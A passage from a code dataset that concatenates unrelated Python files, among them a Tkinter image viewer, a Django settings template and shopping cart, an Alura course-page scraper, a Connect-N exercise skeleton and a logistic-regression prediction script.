Canvas(self.frame, background='white')\n self.canvas.grid(row=5, column=3, rowspan=2, columnspan=3)\n\n '''\n self.btnAdd = Button(self.frame, text = \"Add\", command = self.DebugIncreaseList)\n self.btnAdd.grid(row = 11, column = 3, sticky=(N,S,E,W))\n\n self.btnUpdate = Button(self.frame, text = \"Update\", command = self.UpdateListboxImage)\n 
self.btnUpdate.grid(row = 11, column = 4, sticky=(N,S,E,W))\n\n self.btnUpdate = Button(self.frame, text = \"ImportFolder\", command = self.ImportFolder)\n self.btnUpdate.grid(row = 11, column = 5, sticky=(N,S,E,W))\n\n self.btnClose = Button(self.frame, text = \"Load\", command = master.quit)\n self.btnClose.grid(row = 11, column = 6, sticky=(N,S,E,W))\n '''\n self.ctrPanel = Frame(self.frame)\n self.ctrPanel.grid(row=7, column=2, columnspan=5, sticky=W + E)\n self.prevBtn = Button(self.ctrPanel, text='<< Prev', width=10, command=self.prevImage)\n self.prevBtn.pack(side=LEFT, padx=5, pady=3)\n self.nextBtn = Button(self.ctrPanel, text='Next >>', width=10, command=self.nextImage)\n self.nextBtn.pack(side=LEFT, padx=5, pady=3)\n self.progLabel = Label(self.ctrPanel, text=\"Progress: / \")\n self.progLabel.pack(side=LEFT, padx=5)\n self.tmpLabel = Label(self.ctrPanel, text=\"Go to Image No.\")\n self.tmpLabel.pack(side=LEFT, padx=5)\n self.idxEntry = Entry(self.ctrPanel, width=5)\n self.idxEntry.pack(side=LEFT)\n self.goBtn = Button(self.ctrPanel, text='Go', command=self.gotoImage)\n self.goBtn.pack(side=LEFT)\n\n self.classifyPanel = Frame(self.frame)\n self.classifyPanel.grid(row=9, column=2, columnspan=5, sticky=W + E)\n self.classifyBtn = Button(self.classifyPanel, text='Run Classification', width=25,\n command=self.classifySingleImage)\n self.classifyBtn.pack(side=LEFT, padx=5, pady=3)\n self.classifyAllBtn = Button(self.classifyPanel, text='Run Classification on All', width=30,\n command=self.classifyAllImages)\n self.classifyAllBtn.pack(side=LEFT, padx=5, pady=3)\n # self.progLabel = Label(self.ctrPanel, text = \"Progress: / \")\n # self.progLabel.pack(side = LEFT, padx = 5)\n # self.tmpLabel = Label(self.ctrPanel, text = \"Go to Image No.\")\n # self.tmpLabel.pack(side = LEFT, padx = 5)\n # self.idxEntry = Entry(self.ctrPanel, width = 5)\n # self.idxEntry.pack(side = LEFT)\n # self.goBtn = Button(self.ctrPanel, text = 'Go', command = self.gotoImage)\n # self.goBtn.pack(side = LEFT)\n\n def prevImage(self, event=None):\n print(\"previous image\")\n if self.curImgNumber > 0:\n self.curImgNumber -= 1\n self.imageListbox.see(self.curImgNumber)\n self.LoadImage(self.imageList[self.curImgNumber])\n\n def nextImage(self, event=None):\n print(\"next image\")\n if self.curImgNumber < self.totalImgNumber - 1:\n self.curImgNumber += 1\n self.imageListbox.see(self.curImgNumber)\n self.LoadImage(self.imageList[self.curImgNumber])\n\n def gotoImage(self):\n # print(\"goto image\")\n idx = int(self.idxEntry.get()) - 1\n if 0 <= idx and idx < self.totalImgNumber:\n self.curImgNumber = idx\n self.LoadImage(self.imageList[self.curImgNumber])\n\n def classifySingleImage(self):\n # print(\"classify single image\")\n messagebox.showinfo(\"Results\", \"I don't know\")\n\n def classifyAllImages(self):\n # print(\"classify all images\")\n messagebox.showinfo(\"Results\", \"I don't know\")\n\n def ImportFolder(self):\n self.imageFolderDir = listdir(self.defaultImgDir)\n self.imageList = []\n for image in self.imageFolderDir:\n # print(image)\n self.imageList.append(image)\n self.total = len(self.imageList)\n\n def DebugIncreaseList(self):\n print(\"increase\")\n # print(self.imageList)\n\n def ListboxSelected(self, event=None):\n idxs = self.imageListbox.curselection()\n if len(idxs) == 1:\n idx = int(idxs[0])\n self.curImgNumber = idx\n # print(\"select index %d\" % (idx))\n self.imageListbox.see(idx)\n name = self.imageList[idx]\n self.LoadImage(name)\n\n def LoadImage(self, name):\n\n if name != \"\":\n 
self.progLabel.config(text=\"%04d/%04d\" % (self.curImgNumber + 1, self.totalImgNumber))\n self.imageNameMsg.set(\"Image Loaded: %s\" % (name))\n\n if self.ImgDir != \"\":\n filename = self.ImgDir + name\n else:\n filename = self.defaultImgDir + name\n\n self.img = ImageTk.PhotoImage(Image.open(filename))\n # Canvas_Image = self.canvas.create_image(100,150,image = self.img)\n\n self.canvas.config(width=max(self.img.width(), 300), height=max(self.img.height(), 300))\n self.canvas.create_image(0, 0, image=self.img, anchor=NW)\n # self.canvas.config(text = \"%04d/%04d\" %(2, 5))\n\n '''\n def loadImage(self):\n\n idxs = self.imageListbox.curselection()\n if len(idxs) == 1:\n idx = int(idxs[0])\n self.imageListbox.see(idx)\n name = self.imageList[idx]\n self.imageNameMsg.set(\"Image Loaded: %s\" % (name))\n\n if name != \"\":\n filename = self.initdir + name\n self.img = ImageTk.PhotoImage(Image.open(filename))\n self.canvas.config(width = max(self.img.width(), 400), height = max(self.img.height(), 400))\n self.canvas.create_image(0, 0, image = self.tkimg, anchor=NW)\n self.progLabel.config(text = \"%04d/%04d\" %(self.cur, self.total))\n '''\n\n def Classify(self):\n messagebox.showinfo(\"Results\", \"I don't know\")\n self.UpdateListboxImage()\n\n def LoadFromDir(self, dbg=False):\n result = filedialog.askdirectory(title=\"Select a Folder to import images\")\n if result != \"\":\n\n self.entryFolderName.set(result)\n print(\"Loaded from: \" + result)\n self.ImgDir = result + \"/\"\n # keep only .png files\n self.imageFolderDir = [f for f in listdir(self.ImgDir) if f.lower().endswith('.png')]\n if len(self.imageFolderDir) == 0:\n messagebox.showinfo(\"Warning\", \"No png files in selected folder.\")\n self.imageList = []\n for image in self.imageFolderDir:\n print(image)\n self.imageList.append(image)\n self.UpdateListboxImage()\n self.totalImgNumber = len(self.imageList)\n else:\n messagebox.showinfo(\"Warning\", \"Folder not loaded\")\n\n def LoadDir(self, dbg=False):\n self.imageFolderDir = listdir(self.defaultImgDir)\n self.imageList = []\n for image in self.imageFolderDir:\n print(image)\n self.imageList.append(image)\n self.UpdateListboxImage()\n self.totalImgNumber = len(self.imageList)\n\n def UpdateListboxImage(self):\n self.imageListbox.delete(0, END)\n for image in self.imageList:\n self.imageListbox.insert(END, image)\n\n\nif __name__ == '__main__':\n root = Tk()\n gui = GUI(root)\n root.mainloop()","sub_path":"tst.py","file_name":"tst.py","file_ext":"py","file_size_in_byte":10488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"338894724","text":"#!/usr/bin/env python\n\n''' \n * All rights Reserved, Designed By HIT-Bioinformatics \n * @Title: process.py\n * @Package: argparse, pysam, sys\n * @Description: Control the nTED pipeline\n * @author: tjiang\n * @date: Apr 24 2018\n * @version V1.0 \n'''\n\nimport argparse\nimport sys\nimport pysam\nimport extract, Map, call_TE\n# from process import *\n\nSTAGES = {\"detection\": extract.run, \\\n \"realignment\": Map.run, \\\n \"calling\": call_TE.run}\n\nVERSION=\"1.0.2\"\n\nUSAGE = \"\"\"\\\n _ ___ _ _____ _______ _\n _ _ | ^_ _^ | | ___| |__ __| | |\n | ^_| | | | | | | | |__ | | | |\n | | | | | | | | | __| | | | |\n | | | | | | | | | |___ | | | |___\n |_| |_| |_| |_| |_____| |_| |_____|\n\n rMETL - realignment-based Mobile Element insertion detection Tool for Long read\n\n STAGE is one of\n detection Inference of putative MEI loci.\n realignment Realignment of chimeric read parts.\n calling Mobile Element 
Insertion calling.\n \n See README.md for documentation or --help for details\n \n rMETL V%s\n\"\"\"%(VERSION)\n\ndef parseArgs():\n\n\tparser = argparse.ArgumentParser(prog=\"process.py\", description=USAGE, formatter_class=argparse.RawDescriptionHelpFormatter)\n\n\t# parser.add_argument(\"-h\", \"--help\", action=\"store_true\")\n\tparser.add_argument(\"stage\", metavar=\"STAGE\", choices=STAGES.keys(), type=str, help=\"Stage to execute\")\n\tparser.add_argument(\"options\", metavar=\"OPTIONS\", nargs=argparse.REMAINDER, help=\"Options to pass to the stage\")\n\n\targs = parser.parse_args()\n\n\tSTAGES[args.stage](args.options)\n\nif __name__ == '__main__':\n\tparseArgs()","sub_path":"scripts/Detection/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":1633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"548569072","text":"# -*- coding: utf-8 -*-\nimport os\nimport sys\n\nPROJECT_ROOT = os.path.normpath(\n os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\nfor d in [\"apps\"]:\n if os.path.join(PROJECT_ROOT, d) not in sys.path:\n sys.path.insert(0, os.path.join(PROJECT_ROOT, d))\n\nDEBUG = False\nTEMPLATE_DEBUG = DEBUG\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': '{{ project_name }}',\n 'USER': '{{ project_name }}',\n # see settings/_local.py on production\n 'PASSWORD': '{{ project_name }}'\n }\n}\n\nADMINS = (\n ('Super Man', 'superman@example.com'),\n)\n\nMANAGERS = ADMINS\n\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_PORT = '587'\nEMAIL_HOST_USER = 'noreply@{{ project_name }}.TODO'\nEMAIL_HOST_PASSWORD = '' # see settings/_local.py\nEMAIL_USE_TLS = True\nEMAIL_SUBJECT_PREFIX = '[{{ project_name }}.TODO] '\nDEFAULT_FROM_EMAIL = EMAIL_HOST_USER\n\nALLOWED_HOSTS = ['{{ project_name }}.example.com', ]\n\nSITE_ID = 1\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = None\n\n# If you set this to False, Django will not use timezone-aware datetimes.\nUSE_TZ = True\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\n#LANGUAGE_CODE = 'en'\n\n#gettext = lambda s: s\n#LANGUAGES = (\n# ('ru', gettext('Russian')),\n# ('en', gettext('English')),\n#)\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# A boolean that specifies if data will be localized by default or not. If\n# this is set to True, e.g. Django will display numbers and dates using\n# the format of the current locale.\nUSE_L10N = True\n\n# Absolute filesystem path to the directory that will hold user-uploaded files.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = '%s/media/uploads' % PROJECT_ROOT\n\n# URL that handles the media served from MEDIA_ROOT. 
Make sure to use a\n# trailing slash.\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/uploads/'\n\n# Absolute path to the directory static files should be collected to.\n# Don't put anything in this directory yourself; store your static files\n# in apps' \"static/\" subdirectories and in STATICFILES_DIRS.\n# Example: \"/home/media/media.lawrence.com/static/\"\nSTATIC_ROOT = '%s/media/static' % PROJECT_ROOT\n\n# URL prefix for static files.\n# Example: \"http://media.lawrence.com/static/\"\nSTATIC_URL = '/media/static/'\n\n# Additional locations of static files\nSTATICFILES_DIRS = (\n # Put strings here, like \"/home/html/static\" or \"C:/www/django/static\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n '%s/static' % PROJECT_ROOT,\n)\n\n# List of finder classes that know how to find static files in\n# various locations.\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n #'django.contrib.staticfiles.finders.DefaultStorageFinder',\n)\n\n#STATICFILES_STORAGE = \\\n# 'django.contrib.staticfiles.storage.CachedStaticFilesStorage'\n\n# Make this unique, and don't share it with anybody.\n# Should be overridden in settings/_local.py.\nSECRET_KEY = '{{ secret_key }}'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n ('django.template.loaders.cached.Loader', (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n #'django.template.loaders.eggs.Loader',\n )),\n)\n\nMIDDLEWARE_CLASSES = (\n #'raven.contrib.django.raven_compat.middleware.'\n #'SentryResponseErrorIdMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n # Uncomment the next line for simple clickjacking protection:\n #'django.middleware.clickjacking.XFrameOptionsMiddleware',\n #'django.contrib.flatpages.middleware.FlatpageFallbackMiddleware',\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n \"django.core.context_processors.csrf\",\n \"django.contrib.auth.context_processors.auth\",\n \"django.core.context_processors.debug\",\n #\"django.core.context_processors.i18n\",\n \"django.core.context_processors.media\",\n \"django.core.context_processors.static\",\n \"django.core.context_processors.tz\",\n \"django.contrib.messages.context_processors.messages\",\n \"django.core.context_processors.request\",\n)\n\nROOT_URLCONF = '{{ project_name }}.urls'\n\n# Python dotted path to the WSGI application used by Django's runserver.\nWSGI_APPLICATION = '{{ project_name }}.wsgi.application'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or\n # \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n '%s/templates' % PROJECT_ROOT,\n)\n\nINSTALLED_APPS = (\n '{{ project_name }}.core',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n #'django.contrib.comments',\n #'django.contrib.flatpages',\n 'grappelli',\n 'django.contrib.admin',\n\n #'ckeditor',\n #'contact_form',\n #'honeypot',\n #'flatblocks',\n 
#'markitup',\n #'sorl.thumbnail',\n #'rollyourown.seo',\n 'south',\n 'raven.contrib.django.raven_compat',\n)\n\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': True,\n 'root': {\n 'handlers': ['console', 'sentry'],\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'formatters': {\n 'verbose': {\n 'format': '%(levelname)s %(asctime)s %(pathname)s|'\n '%(funcName)s() %(message)s'\n },\n 'simple': {\n 'format': '[%(levelname)s] %(message)s'\n },\n },\n 'handlers': {\n 'sentry': {\n 'level': 'WARNING',\n 'class': 'raven.contrib.django.raven_compat.handlers.'\n 'SentryHandler',\n 'filters': ['require_debug_false']\n },\n 'console': {\n 'level': 'INFO',\n 'class': 'logging.StreamHandler',\n 'formatter': 'simple',\n }\n },\n 'loggers': {\n 'django.db.backends': {\n 'level': 'ERROR',\n 'handlers': ['console'],\n #'propagate': False,\n },\n 'raven': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n 'sentry.errors': {\n 'level': 'DEBUG',\n 'handlers': ['console'],\n 'propagate': False,\n },\n },\n}\n\n####### app-specific settings ########\n\nGRAPPELLI_ADMIN_TITLE = '{{ project_name }} admin site'\n\n#CKEDITOR_UPLOAD_PATH = '%s/ckeditor' % MEDIA_ROOT\n#CKEDITOR_CONFIGS = {\n# 'full': {\n# 'toolbar': 'Full',\n# 'language': 'ru',\n# },\n# 'default': {\n# 'toolbar': [\n# ['Bold', 'Italic', '-', 'NumberedList', 'BulletedList', '-',\n# 'Link', 'Unlink', 'Source']\n# ],\n# 'height': 300,\n# 'width': 800,\n# 'language': 'ru',\n# },\n#}\n","sub_path":"project_name/settings/_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":7834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"367606038","text":"from django.contrib import admin\n\nfrom core.models import Group, Student\n\n\nclass StudentsInline(admin.StackedInline):\n model = Student\n extra = 0\n\n\nclass GroupAdmin(admin.ModelAdmin):\n inlines = (StudentsInline,)\n list_display = ('name', 'warden', 'students_count')\n\n\nadmin.site.register(Group, GroupAdmin)\n","sub_path":"groups/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"266323464","text":"from bs4 import BeautifulSoup\nfrom http.cookiejar import CookieJar\nimport mechanize\nimport os\n\nliga = 'https://cursos.alura.com.br'\n\n\n# lists properties\ndef _listing(opcoes):\n while True:\n escolha = ''\n os.system('cls')\n print(' | '.join(str(i) for i in opcoes))\n print('Selecione uma das opções:')\n opcao = input()\n for i in opcoes:\n if opcao in i and opcoes:\n escolha = i\n break\n if escolha:\n break\n return escolha\n\n\n# Scraps Alura Formations!\nclass AluraScraper:\n\n def __init__(self, session=None):\n # If called by AluraLogin, uses session from AluraLogin\n if session:\n self._session = session\n self._principal = self._session.open(liga + '/formacoes').read()\n # else if called without AluraLogin, create its own session\n else:\n session = mechanize.Browser()\n self._principal = session.open(liga + '/formacoes').read()\n # properties to save time next time it uses again\n self._categories = None\n self._category = None\n self._formations = None\n\n # Scrap formations videos from json requests and save to data.txt\n def formation_scraper(self, links):\n result = []\n for link in links:\n print(link + '/video')\n req = self._session.open(link + '/video').read()\n result.append(req)\n try:\n 
os.remove('data.txt')\n except OSError:\n pass\n with open('data.txt', 'w') as f:\n for item in result:\n f.write(f'{item}\\n')\n print('Done! Saved in data.txt')\n\n # Scrap categories and formations from the site\n def _text_scraper(self, tag='li', category=None):\n classes = ['formacoes__item', 'formacao__link']\n links = []\n soup = BeautifulSoup(self._principal, 'html.parser')\n if category is None:\n for a in soup.find_all(tag, class_=classes[0]):\n links.append(a['id'])\n else:\n li = soup.find('li', id=category, recursive=True)\n for i in li.findChildren('a', class_=classes[1]):\n links.append(i['href'])\n return links\n\n # saves categories and formations to the properties\n def formation_categories(self):\n if not self.categories:\n self.categories = self._text_scraper()\n if not self.category:\n self.category = _listing(self.categories)\n if not self.formations:\n self.formations = self._text_scraper(category=self.category)\n\n @property\n def categories(self):\n return self._categories\n\n @categories.setter\n def categories(self, value):\n self._categories = value\n\n @property\n def category(self):\n return self._category\n\n @category.setter\n def category(self, value):\n self._category = value\n\n @property\n def formations(self):\n return self._formations\n\n @formations.setter\n def formations(self, value):\n self._formations = value\n\n\n# Crawls all video links from a formation\nclass AluraCrawler(AluraScraper):\n def __init__(self, session=None):\n self._session = session\n super().__init__(self._session)\n self._link = None\n self._links = None\n\n # Choose formation using href tag list from alura page\n def choose_formation(self, formacoes):\n formacao = _listing(formacoes)\n print(formacao + ' escolhida...')\n self.link = ['https://cursos.alura.com.br' + formacao]\n\n # Crawls every link that has video from a formation\n def formation_crawler(self, lst=None, aux=0):\n if not lst:\n lst = self.link\n classes = ['learning-content__link', 'courseSectionList-section', 'task-menu-nav-item-link-VIDEO']\n links = []\n for link in lst:\n req = self._session.open(link).read()\n links.extend(self.__link_crawler(classes, req, aux))\n print(links)\n if aux < 2:\n return self.formation_crawler(lst=links, aux=aux + 1)\n self.links = links\n\n # submethod for formation_crawler\n @staticmethod\n def __link_crawler(classes, req, aux=0):\n links = []\n soup = BeautifulSoup(req, 'html.parser')\n for a in soup.find_all('a', class_=classes[aux]):\n if a['href'].startswith('/'):\n print(a['href'])\n links.append(liga + a['href'])\n return links\n\n @property\n def link(self):\n return self._link\n\n @link.setter\n def link(self, value):\n self._link = value\n\n @property\n def links(self):\n return self._links\n\n @links.setter\n def links(self, value):\n self._links = value\n\n\n# Login to Alura\nclass AluraLogin(AluraCrawler):\n def __init__(self, user, password):\n cj = CookieJar()\n self._session = mechanize.Browser()\n self._session.set_handle_robots(False)\n self._session.set_cookiejar(cj)\n self._session.open(\"https://cursos.alura.com.br/loginForm\")\n self._session.select_form(nr=1)\n self._session.form['username'] = user\n self._session.form['password'] = password\n self._session.submit()\n super().__init__(self._session)\n","sub_path":"alurascraper.py","file_name":"alurascraper.py","file_ext":"py","file_size_in_byte":5307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"553016964","text":"# %load 
connect_n.py\n\nWHITE_DISK = '\\u26AA'\nBLACK_DISK = '\\u26AB'\nFW_SPACE = '\\u3000' # fullwidth space\nFW_LINE = '\\u2015' # fullwidth horizontal line\n\n# the game itself\ngame = { \n 'N' : 4, \n 'board':[], # the connect-n board\n 'moves':[] # the moves by players \n}\n\ndef create_board(n):\n '''create the board for the Connect-N game'''\n game['N'] = n\n \n # your code should instead create an empty board with N+3 rows and N+2 Columns\n # example code below, creating a board with 4 rows and 3 columns, with some pre-filled disks\n # 0 - empty, 1 - white disk, 2 - black disk\n board = [[0,1,2],[0,0,0], [0,0,0], [0,0,0]]\n game['board'] = board\n \ndef display_board():\n '''print the board content'''\n \n # Unicode example below. You should update the code below by\n # 1. use a for loop\n # 2. allow it to display board of different sizes\n w = f'{WHITE_DISK:^3}' # white\n b = f'{BLACK_DISK:^3}' # black\n e = f'{FW_SPACE:^3}' # empty\n separator = FW_LINE*20\n \n board = game['board']\n s = ''\n for i in range(game['N']): # you should use nested for loop here\n cell = board[0][i] \n if cell == 0: \n s = s + f'| {e}'\n elif cell == 1:\n s = s + f'| {w}'\n elif cell == 2:\n s = s + f'| {b}'\n print(s)\n \ndef drop_disk(c):\n '''drop disk at column c'''\n print('drop disk at...')\n \ndef check_winning():\n '''check if there is a winner'''\n print('winner is ...')\n \ndef save_board(fname):\n '''save the game'''\n # you should save all the information in the game\n print('save_board')\n \ndef load_board(fname):\n '''load the game'''\n # load the game\n print('load board')\n\ndef show_moves():\n '''show all previous moves'''\n # for example, ['W2', 'B2'] means white drops disk column 2 and black drops disk at column 2\n print('show all moves')\n \n# EXAMPLE SCEANRIO BELOW\n# N = input('Please input the size of your board:')\n\nN = 3 # your code should allow user inputs instead\ncreate_board(N)\ndrop_disk(2) # white drop disk at column 2\ncheck_winning()\ndrop_disk(2) # black drop disk at column 2\ncheck_winning()\ndrop_disk(3) # white drop disk at column 3\ncheck_winning()\ndrop_disk(3) # black drop disk at column 3\ncheck_winning()\ndrop_disk(4) # white drop disk at column 4\ncheck_winning() # white wins because she conencts 3 disks\ndisplay_board()\n","sub_path":"2021S1-Connect-n (1).py","file_name":"2021S1-Connect-n (1).py","file_ext":"py","file_size_in_byte":2405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"384150848","text":"import sys\n\nfrom tornado.httpserver import HTTPServer\nfrom tornado.ioloop import IOLoop\nfrom tornado.routing import URLSpec\nfrom tornado.web import Application\nfrom tornado_utils2.handlers.ping import PingPongHandler\nfrom app.handlers import *\n\nfrom settings import logger\n\n\ndef main():\n logger.info('Create web app')\n app = Application(\n handlers=[\n URLSpec(r'/ping', PingPongHandler),\n URLSpec(r'/api/v2/by_passport_data', ByPassportData),\n URLSpec(r'/api/v2/by_msisdn', ByMSISDN),\n URLSpec(r'/api/v2/simple_check', SimpleCheck),\n ],\n debug=True,\n )\n\n logger.info(f'Start HTTP server, port 8000')\n server = HTTPServer(app)\n server.application = app\n server.bind(8000)\n server.start()\n\n logger.info('Starting IOLoop')\n IOLoop.current().start()\n\n\nif __name__ == '__main__':\n try:\n main()\n except KeyboardInterrupt:\n logger.info('*' * 30)\n logger.info('Hasta la vista, baby!')\n logger.info('*' * 30)\n 
sys.exit(0)\n","sub_path":"fake_ids_api.py","file_name":"fake_ids_api.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"290499069","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.shortcuts import render, redirect, get_object_or_404\n\nfrom catering.models import CateringProduct\nfrom .models import Cart, CartItem\n\n\ndef _cart_id(request):\n cart = request.session.session_key\n if not cart:\n cart = request.session.create()\n return cart\n\n\ndef cart_details(request, total=0, counter=0, cart_items=None):\n try:\n cart = Cart.objects.get(cart_id=_cart_id(request))\n cart_items = CartItem.objects.filter(cart=cart, active=True)\n for cart_item in cart_items:\n total += cart_item.product.price * cart_item.quantity\n counter += cart_item.quantity\n except ObjectDoesNotExist:\n pass\n\n return render(request, 'cart.html', {\n 'cart_items': cart_items,\n 'total': total,\n 'counter': counter\n })\n\n\ndef add_to_cart(request, slug):\n product = CateringProduct.objects.get(slug=slug)\n try:\n cart = Cart.objects.get(cart_id=_cart_id(request))\n except Cart.DoesNotExist:\n cart = Cart.objects.create(\n cart_id=_cart_id(request)\n )\n cart.save()\n\n try:\n cart_item = CartItem.objects.get(product=product, cart=cart)\n if cart_item.quantity < cart_item.product.stock:\n cart_item.quantity += 1\n cart_item.save()\n except CartItem.DoesNotExist:\n cart_item = CartItem.objects.create(\n product=product,\n quantity=1,\n cart=cart\n )\n cart_item.save()\n return redirect('cart:cart_details_url')\n\n\ndef remove_from_cart(request, slug):\n cart = Cart.objects.get(cart_id=_cart_id(request))\n product = get_object_or_404(CateringProduct, slug=slug)\n cart_item = CartItem.objects.get(product=product, cart=cart)\n if cart_item.quantity > 1:\n cart_item.quantity -= 1\n cart_item.save()\n else:\n cart_item.delete()\n return redirect('cart:cart_details_url')\n\n\ndef full_remove_from_cart(request, slug):\n cart = Cart.objects.get(cart_id=_cart_id(request))\n product = get_object_or_404(CateringProduct, slug=slug)\n cart_item = CartItem.objects.get(product=product, cart=cart)\n cart_item.delete()\n return redirect('cart:cart_details_url')\n","sub_path":"cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"545260872","text":"# This script requires numpy and matplotlib to be installed, but I think you\n# *probably* have those installed.\n\n# If you don't have these, you can install them with pip.\n\nimport math\nimport numpy\nimport matplotlib.pyplot as plt\n\ndef generate_points(tlst):\n xpts = []\n ypts = []\n for t in tlst:\n y = abs(6*t) + 0.25\n x = t\n \n xpts.append(x)\n ypts.append(y)\n \n return xpts, ypts\n\ndef generate_verticals(xpt, ystart, yfin, pts):\n xpts = []\n ypts = []\n for i in numpy.arange(ystart, yfin, (yfin-ystart)/float(pts)):\n xpts.append(xpt)\n ypts.append(i)\n \n \n return xpts, ypts\n \ndef generate_diagonals(ystart, yfin, pts):\n xpts = []\n ypts = []\n \n for i in numpy.arange(-1, 1, (2/float(pts))):\n xpts.append(i)\n \n for i in numpy.arange(ystart, yfin, (yfin-ystart)/float(pts)):\n ypts.append(i)\n \n return xpts, ypts\n \nif __name__ == \"__main__\":\n hbase = 6\n \n plt.title('Love you, Gabrielle!')\n plt.yticks([])\n plt.xticks([])\n\n plt.axis([-2,2,0,11])\n tmp = generate_points(numpy.arange(-1, 1, 0.01))\n 
plt.plot(tmp[0],tmp[1], 'ro')\n\n tmp = generate_verticals(-0.33, hbase, hbase + 4, 100)\n plt.plot(tmp[0],tmp[1], 'ro')\n\n tmp = generate_verticals(0.33, hbase, hbase + 4, 100)\n plt.plot(tmp[0],tmp[1], 'ro')\n\n tmp = generate_diagonals(hbase + 2 , hbase + 1, 100)\n plt.plot(tmp[0], tmp[1], 'ro')\n\n tmp = generate_diagonals(hbase + 3 , hbase + 2, 100)\n plt.plot(tmp[0], tmp[1], 'ro')\n plt.show()\n","sub_path":"all_the_dibs.py","file_name":"all_the_dibs.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"109806164","text":"#!/usr/bin/env python3\nimport csv\nimport sys\nfrom math import *\nimport numpy as np\n\n\ndef sigmoid(x) :\n\treturn (1. / (1. + np.exp(-x)))\n\ndef h(coef, features) :\n\treturn sigmoid(features.T @ coef)\n\ndef scale(tab, min, maxi):\n\tif (min == maxi):\n\t\tmin = 0\n\tfor (i, f) in enumerate(tab):\n\t\ttab[i] = ((f - min) / (maxi - min)) * 2 - 1\n\treturn (tab)\n\n\ndef get_coef(student, coef_g, coef_r, coef_s, coef_h):\n\tguess_g = h(coef_g, student)\n\tguess_r = h(coef_r, student)\n\tguess_s = h(coef_s, student)\n\tguess_h = h(coef_h, student)\n\n\tok = max(guess_g, guess_r, guess_s, guess_h)\n\tif (ok == guess_g):\n\t\treturn (\"Gryffindor\")\n\telif (ok == guess_r):\n\t\treturn (\"Ravenclaw\")\n\telif (ok == guess_s):\n\t\treturn (\"Slytherin\")\n\telif (ok == guess_h):\n\t\treturn (\"Hufflepuff\")\n\nif (len(sys.argv) != 3):\n\tprint(\"Usage: \" + sys.argv[0] + \" file.csv params.npz\")\n\tsys.exit()\n\ntry:\n\tparams = np.load(sys.argv[2])\nexcept:\n\tsys.exit(0)\n\n\ncoef_g = params[\"Gryffindor\"]\ncoef_r = params[\"Ravenclaw\"]\ncoef_s = params[\"Slytherin\"]\ncoef_h = params[\"Hufflepuff\"]\nmin = params[\"min\"]\nmaxi = params[\"max\"]\n\n\n\ntry:\n\tcsvfile = open(sys.argv[1], 'r')\n\thouses = open(\"houses.csv\", 'w+')\nexcept Exception as e:\n\tprint(\"An error occurred while opening a file : \" + str(e))\n\tsys.exit()\n\n\nreader = csv.reader(csvfile, delimiter=',')\nfirst = False\n\narray = []\nfor r in reader:\n\tif (first == False):\n\t\tfields = r\n\t\tfirst = True\n\telse:\n\t\tarray.append(r)\nar = np.array(array)\n\n\n\ny = ar[ :, 1]\n\nar[ar == ''] = 0 # TODO: watch out for NaNs\n\nfeatures = np.concatenate((np.ones((len(ar), 1)), ar[:, 6:].astype(np.float64)), axis=1)\n\nfor i in range(np.size(features,1)):\n\tfeatures[ : , i] = scale(features[: , i], min[i], maxi[i])\n\nok = 0\nerror = 0\nstudent = []\n\nfor i, line in enumerate(features):\n\tstudent.append(get_coef(line, coef_g, coef_r, coef_s, 